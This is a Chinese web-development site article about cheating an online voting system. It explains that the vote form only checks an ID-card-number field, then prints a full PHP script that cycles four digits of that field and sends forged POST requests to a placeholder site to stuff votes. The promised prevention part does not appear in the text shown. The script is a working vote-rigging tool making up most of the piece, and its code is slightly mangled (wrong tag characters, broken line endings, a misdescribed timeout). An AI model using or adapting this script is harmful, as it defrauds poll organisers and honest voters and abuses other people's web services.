WEB开发网
开发学院网络安全安全技术 巧妙的投票作弊与严密的防范系统 阅读

巧妙的投票作弊与严密的防范系统

 2009-01-06 13:49:02 来源:WEB开发网   
核心提示: 直接在IE里打开此页面会出现如图3的提示图1但只要我们把其中的idcord=1234567890改为idcord=1234567891就会出现投票成功的对话框.知道了投票系统存在的缺陷后..现在就想办法利用程序实现刷票的目的..写一个发包的程序把idcord设置为一个变量.然后每发送一次数

直接在IE里打开此页面会出现如图3的提示

巧妙的投票作弊与严密的防范系统

图1

但只要我们把其中的idcord=1234567890改为idcord=1234567891就会出现投票成功的对话框.知道了投票系统存在的缺陷后..现在就想办法利用程序实现刷票的目的..

写一个发包的程序把idcord设置为一个变量.然后每发送一次数据这个变量得数字就增加一个数.比如idcord=1234567**9循环一次就是idcord=1234567*79自动改变其中的数值..

这样的程序用VB.C.ASP,PHP都不难实现..下面就介绍下PHP的..以下所涉及到的PHP代码为EST的兄弟TTFCT所写.

程序完整代码(目标网站做了相应处理)

{?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",2);
print_r(Voting.... );
for($i=0;$i〈=9;$i++)
for($j=0;$j〈=9;$j++)
for($k=0;$k〈=9;$k++)
for($l=0;$l〈=9;$l++)
{
$packet ="POST /ad/20061221/a.asp?action=add HTTP/1.1 rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */* rn";
$packet.="Referer: http//www.xxx.com/ad/20061221/a.asp rn";
$packet.="Accept-Language: zh-cn rn";
$packet.="Content-Type: application/x-www-form-urlencoded rn";
$packet.="Accept-Encoding: gzip, deflatern";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)rn";
$packet.="Host: www.xxx.com rn";
$packet.="Content-Length: 113 rn";
$packet.="Connection: Keep-Alive rn";
$packet.="Cache-Control: no-cache rn";
$packet.="Cookie: ASPSESSIONIDASDCQDBT=NKKJPDLAMAMNHJHHNBBLOCCHrnrn";
$packet.="Aname=%B7%E7%26%238226%3B%BB%AA%C0%C8&username=%B2%E2%CA%D4&tel
=13013011111&idcord=1234".$i.$j.$k.$l."90&Submit=%CC%E1%BD%BBrn";
if($fp=fsockopen("www.xxx.com",80,$errno,$errstr,50))
if(fwrite($fp,$packet,strlen($packet)))
print_r(
Success to vote
);
sleep(2);
print_r(
Wait for 2 seconds
);
}
?}

PHP的朋友一眼就能看出,这只是个发包的程序..其中ini_set("default_socket_timeout",2);为发送数据包的间隔时间为2秒.

Tags:巧妙 投票 作弊

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接